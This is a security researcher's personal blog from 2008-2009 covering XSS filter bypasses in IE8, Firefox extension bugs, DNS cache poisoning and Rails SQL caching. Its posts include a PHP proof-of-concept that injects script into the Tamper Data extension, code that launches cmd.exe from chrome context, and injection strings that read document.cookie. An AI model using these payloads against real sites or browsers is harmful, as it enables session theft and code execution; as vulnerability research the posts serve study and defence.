Thursday, July 16, 2009

It's been a while

So it's been a while since I've posted anything here, mostly because this blog was the product of a hell of a lot of free time (aka high school), I've been going to uni full time and working part time, which hasn't left me with a lot of free time, and on top of that I figured out that if I put the same content into slides, rather than writing blog posts, I can present it at conferences (selling out++) and have a fun time doing so.

In any case, I did some presentations recently and thought I should probably put details up here.

I did a talk last November at Power of Community and XCon about the Same Origin Policy and some new ways of looking at it, where most of the new material was along the line of the GIFAR attacks Billy Rios came up with that Nate McFeters, etc, ended up presenting at BlackHat which took a lot of the wind out of my sails *shrug*, it should be interesting as it covers a lot of other things and points people in some uncommon directions, I've uploaded the paper I wrote and the slides here:

Slides
Paper

I also did a talk at RUXCON and 25c3 with Stefano Di Paola (and I even spelled his surname correctly this time! ^_^) called Attacking Rich Internet Applications, so here are some materials:

RUXCON Slides
25c3 Video Recordings

I never ended up releasing this while it worked since I didn't want to kill a bug, but if you look at the video or were at the presentation you may have seen me demonstrate an exploit for Tamper Data, the bug is almost identical to this one that I had claimed was exploitable. While my rationale in that post was incorrect (due to me testing with an old version of Tamper Data which was vulnerable in the way described), I came up with an interesting exploit for the bug in Firefox 3 which could have gained me code execution by editing about:config entries.

Here is the PoC exploit:

<?php
//This is just a PoC, have a look through about:config for any _string_ entry you would want to change
//This bug is kind of lame, but the exploit is cool, since it uses a Firefox bug to do damage (this should be unexploitable)
//Bug fires when a user graphs a malicious http request (open tamper data, graph the attack request)
header ("HTTP/1.1 200 OK<BR><B>Mime Type</B>: text/html\",event);' onMouseOut='hide_info();'><script>opener.oTamper.preferences.PREFERENCES_ROOT='';opener.oTamper.preferences.init();opener.oTamper.preferences.setString('app.update.url', 'jajaja');</script><g/='");
?>


The bug is triggerable on old Tamper Data versions where the Graph Requests functionality worked, and if you graphed the malicious request/response the exploit would set the app.update.url would be set to jajaja.

The bug works by abusing a lack of access control on any objects that extensions create in their windows (It wasn't just Tamper Data, it happened in other extensions), where it was possible to read and modify the objects, and more importantly: call their functions. When you called a function that an extension had created, it was executed in the context of the extension, namely chrome code.

It did not end up being necessary or useful for this exploits, however it was possible to call those functions and completely control all the data, etc, via calls such as opener.oTamper.whatever_function.apply(our_obj).

In any case, the access control bug died some time in the last few Firefox 3.0.X releases, but I'm not really sure which since the graphing functionality in Tamper Data hasn't been working for even longer, and it got to be too much effort to double check it.

I also did a presentation at the OWASP Australia Conference in February titled "Examining and Bypassing the IE8 XSS Filter", which might be some nice background for people, but will probably be greatly surpassed by sirdarckcat & thornmaker's upcoming Black Hat presentation. Here are the Slides.

I also did a presentation on Writing Better XSS Payloads at EUSecWest in May, however I haven't uploaded the slides since I'm trying to submit it to Hack In The Box Malaysia to have the material reach a wider audience, so unless it is rejected, you'll have to wait until then to see it... Or email me.

And that's all for now...

Wednesday, September 24, 2008

Dynamic XSS Payloads in the face of NoScript

While participating in the CSAW CTF on the weekend before last with s0ban, sirdarckcat and maluc (which we won btw, with 16375 points; RPISEC who placed second had 13575 points, go us ;), I had an interesting thought; one of our attacks was a persistent xss attack that loaded it's payload from off-site so that we could gain some level of persistent control, however I realised that this attack would fail completely in the face of NoScript even if our xss succeeded since the person would not have our malicious domain whitelisted.

So, in light of that, I was thinking of how we could load our payload from off-site, without the remote site running JavaScript. Of course, I am assuming you have already bypassed NoScript's XSS Filters (e.g. because the attack was persistent), but this information is particularly useful for persistent attacks when you may want to change the payload.

After thinking about this for a while, I realised that we've already solved the problem a while ago when we were talking about using TinyURL for data storage way back in 2006: http://kuza55.blogspot.com/2006/12/using-tinyurl-for-storage-includes-poc.html.

Of course TinyURL would be of no use to us here as we are interested in being able to change our payload, however all it would require to be useful is (possibly some kind of synchronisation so that we execute in the order we want, rather than the order we get data back from our evil web server and) changing the URL to point to a domain you control.

Nothing really ground-breaking, but something interesting nonetheless.

Thursday, September 04, 2008

IE8 XSS Filter

IE8 came out recently and a bunch of people have already commented about the limitations of the XSS Filter.

But there are a few more issues that need to be looked at. First of all, if anyone hasn't already done so, I recommend reading this post by David Ross on the architecture/implementation of the XSS Filter.

After talking Cesar Cerrudo, it became clear that we both came to the conclusion that the easiest way to have a generic bypass technique for the filter would be to attack the same-site check, and we both came to the conclusion that, if we can somehow force the user to navigate from a page on the site we want to attack to our xss, then we've bypassed the filter.

If the site is a forum, or a blog, then this becomes trivial as we're allowed to post links, however even if we cannot normally post links this is still trivial as we can inject links in our XSS as the XSS Filter doesn't stop HTML Injection, in any case read this for more details.

However, this is not the only way to force a client-side navigation. One particular issue (which is normally not considered much of a vulnerability, unless it allows xss vulns) is when an application lets users control the contents of a frame, this is often seen in the help sections of web apps. However navigation caused by an iframe seems to be considered somehow user-initiated (or something) and the same-site check is applied so that if we point a frame on a site to an xss exploit, the xss exploit will trigger.

Initially I had thought this would extend to JavaScript based redirects of the form:
document.location = "http://www.site.com/user_input";
or in the form of frame-breaking code, however this does not seem to be the case. IE attempts to determine whether a redirect was user-initiated or not and if it decides it is not user-initiated then it does not apply the same-site check and simply initiates the XSS Filter, though as with the popup blocker before it has some difficulty being correct 100% of the time, e.g. this counts as a user-initiated navigation:
<a name="x" id="x" href="http://localhost/xss.php?xss=<script>alert(7)</script>">test</a>
<script>
document.links[0].click();
</script>

However this is probably a very unrealistic issue as we need to vulnerable site to actually let the attacker create such a construct.

Furthermore HTTP Location redirects and Meta Refreshes are also not considered user navigation so filtering is always applied to those, therefore Open Redirects are pretty irrelevant to the XSS Filter.

However, Flash-based redirects do not seem to be considered redirects (which is unsurprising given that IE has no visibility into Flash files) and so any Flash-based redirects can be taken advantage of to bypass the xss filter, though if they require a user to click then it is probably simply easier to just inject a link (as described in Cesar's post)

And that's about all I could think of wrt that check :S

However, if you go read Cesar's post you'll see we now do have a method to generically bypass the IE8 XSS Filter, and it only requires an additional click from the user, anywhere on the page.

In a completely different direction, When I first read the posts that said the XSS filter was going to prevent injections into quoted JavaScript strings, my first thought was "yeah, right, let's see them try", as I had assumed they would attempt to prevent an attacker breaking out of the string, however the filter has signatures to stop the actual payload. Essentially the filter attempts to stop you from calling a JavaScript function and assigning data to sensitive attributes, so all of the following injections are filtered:
"+eval(name)+"
");eval(name+"
";location=name;//
";a.b=c;//
";a[b]=c;//

among a variety of other sensitive attributes, however this does still leave us with some limited scope for an attack that may be possible in reasonably complicated JavaScript.

We are still left with the ability to:
- Reference sensitive variables, which is esnecially useful when injecting into redirects, e.g.
"+document.cookie+"
- Conducting variable assignments to sensitive data, e.g.
";user_input=document.cookie;//
or
";user_input=sensitive_app_specific_var;//
- Make function assignments, e.g. (Note though that you can't seem to assign to some functions e.g. alert=eval doesn't seem to work)
";escape=eval;//

Also, like the meta-tag stripping attack described by the 80sec guys (awesome work btw, go 80sec!), we can strip other pieces of data (which look like xss attacks) such as frame-breaking code, redirects, etc, but note we can't strip single lines of JS as the JS block needs to be syntactically valid for it to start getting executed, so anything potentially active which acts as a security measure beyond the extent of it's own tag can be stripped.

It's also worth noting that XSS Filter doesn't strip all styles, it only strips those that would allow more styles to slip past it and styles which can execute active code (which is pretty much just expression() )

And that's all for me at the moment; if anyone's looking for an interesting area for research, see if the IE8 XSS Filter always plays nice with server-side XSS Filters, who knows, maybe being able to break the context by getting the filter to strip stuff you can get your own html to be rendered in a different context that the server-side filter didn't expect.

P.S. Take this all with a grain of salt, this has been derived through black-box testing, and as such any of the conclusions above are really just educated guesses.

P.P.S Good on David Ross and Microsoft for making a positive move forward that's going to be opt-out. Obviously everyone is going to keep attacking it and finding weaknesses, but even if this only stops the scenario where the injection is right in the body of the page, then it's a huge step forward for webappsec; if this effectively blocks injections into JavaScript strings then ASP.NET apps just got a whole lot more secure.
Though I still think the HTML-injection issue needs to be fixed, because even if it's an additional step, users are going to click around and we're just going to see attackers start utilising HTML injection

P.P.P.S. Don't forget this is based on security zones, so it can be disabled and is by default opt-in for the intranet zone, so all those local zone xss's for web servers on localhost or xss's for intranet apps are going to be largely unaffected

Wednesday, August 06, 2008

Thoughts on the DNS patch/bug

Is it just me, or does the DNS patch only seem to buy us more time?

At most this decreases the chance of a succesful attack 65k times, at worst it doesn't help because of NAT, and if you're running a default MS <= win2k3 OS then it's 2.5k times.

Honestly, I haven't had time to play around with any of the exploits floating around, but given 1 attempt = at most 2 packets (though it's probably much closer to 1, since you can try lots of responses per packet), we can send 32k packetrs pretty quickly, and the figures here also seem to say it works pretty damn quickly.

I'm not going to do any figures, but given how network speeds seem to go constantly upwards (or do we want to speculate about an upper cap?), we're going to reach a problem at some stage where senging 65k times the amount of data is going to be bloody fast again, and this will be an issue all over again.

And if that ever happens; what's left to randomize in the query? nothing as far as I can tell, so is the hope that by then we'll have all switched to DNSSEC, or are we planning on altering the DNS protocol at that point?

Anyway, going in a completely different direction, I want to take issue with the idea that seems to be pervading a lot of descriptions of the DNS bug that poisoning random subdomains isn't an issue.

For your typical attack, yes, poisoning random subdomains is kind of useless, however a lot of the web is held together by the idea that absolutely everything in a DNS tree of a domain is controlled by that domain and is to some extent trustworthy (think cookies and document.domain in JavaScript).

Also, it seems odd that given that the fact that you could poison random domains seems common knowledge to some people Dan is nominated for another pwnie award for XSS-ing arbitrary nonexistant subdomains. Sure, that bug gives you the ability to phish people more easil, but to me the biggest part of that seemed to be the fact that you could easily attack the parent domains form there.

Anyway, the patch, while having it's limitations, seems to buy us some time with both these bugs, and in fact should buy us time with any bugs where responses are forged, so that's always a good thing.

Sunday, August 03, 2008

Is framework-level SQL query caching dangerous?

I was in a bookshop a few months ago and picked up a book about Ruby on Rails, and though I sadly didn't buy it (having already bought more books than I wanted to carry) and I've forgotten it's name, there was an interesting gem in there that stuck in my head.

Ruby on Rails' main method of performing SQL queries (ActiveRecord) since 2.0, by default, caches the results of SELECT queries (though it does string-level matching of queries, so they need to be completely identical, rather than functionaly identical) untill a relevant update query updates the table.

I haven't had a chance to delve into the source to see how granularly the cache is updated (i.e. if a row in the cache was not updated in an update, is the cache still invalidated sinc ethe table was updated?), but in any case, it still seems dangerous.

Caching data that close to the application means that unless you know about the caching and either disable it or ensure that anything else that possibly updates the data also uses the same cache, you may end up with an inconsistent cache.

Assuming that flushing the cache is fairly granular operation (or there is very little activity on the table or users are stored as separate tables, or something similar), it seems feasible that if there is any other technology interacting with the same database, it would be possible to ensure that dodgy data is cached in the Rails app.

A possible example would be a banking site where an SQL query like
SELECT * FROM accounts WHERE acct_id = ?
Is executed when you view the account details or attempt to transfer money, then if there was another interface to withdraw money (lets say an ATM even; doesn't have to be web-based) that bypassed Rails' SQL cache it is theoretically possible that if we would be able to withdraw the money, but the Rails app would still think that we had money left.

At this point of course things would become very implementation specific, though there are two main ways I could see this going (maybe there are more):

1. We could be lucky and the application itself subtracts the amount we're trying to transfer and then puts that value directly into an SQL query, so it's as if we never withdrew any money.

2. We could be unlucky and an SQL query of this variety is used:
UPDATE accounts SET balance = balance - ? WHERE acct_id = ?
In which case the only thing we gain is the ability to overdraw from an account where we would not be able to usually; not particularly useful unless you've stolen someone else's account already and want to get the most about it, but it does still allow us to bypass a security check.

Does anyone have any thoughts on this? Is this too unlikely? Is no-one ever going to use Rails for anything sensitive? Should I go and read the source next time before posting crap? etc
Or knowledge of the Rails caching mechanism? I'll probably take a look soon, but given I've been meaning to do this for months...

Sunday, July 27, 2008

XSS-ing Firefox Extensions

[EDIT]:It turns out I fail at testing things on the latest version, see comments for some more details, sorry about that Roee.[/EDIT]

Roee Hay recently posted a blog post on the Watchfire blog about an XSS bug in the Tamper Data extension (it was posted much earlier, but removed quickly; RSS is fun), however when he assessed the impact he was wrong.

The context of the window is still within the extension, and so by executing the following code you can launch an executable:



var file = Components.classes["@mozilla.org/file/local;1"]
.createInstance(Components.interfaces.nsILocalFile);
file.initWithPath("C:\\WINDOWS\\system32\\cmd.exe");
file.launch();



(Code stolen from http://developer.mozilla.org/en/docs/Code_snippets:Running_applications)

But even then; I had never even heard of the Graphing functionality in Tamper Data, and given the need to actually use the functionality on a dodgy page, the chance of anyone getting owned with this seems very small to me.

Monday, July 21, 2008

Licensing Content

Now, I am not a lawyer (so I don't know what information can be licensed and what can't), but as far as I know the fact that I have specified no license for the use of content on this blog does not mean it is public domain, or similar.

So, I just wanted to make a quick post about what license the content of this blog is provided under.

All the information on this blog is DUAL LICENSED,
1. If you plan to use it for personal or non-profit purposes you can use it under the Creative Commons "Attribution-Noncommercial-Share Alike 3.0" license.

2. In the case you plain to use it for _any_ other purpose, e.g.:
   a. use the information in any commercial context
   b. implement this information in your non-GPL application
   c. use this information during a Penetration Test
   d. make any profit from it
   
   you need to contact me in order to obtain a commercial license.

Seems only fair to me :)

P.S. Since realistically the chance of me finding a violation is slim-to-none, and the chance of me actually doing anything about it (e.g. going to court, etc), is even smaller, this is more a statement of my will for the information than anything else.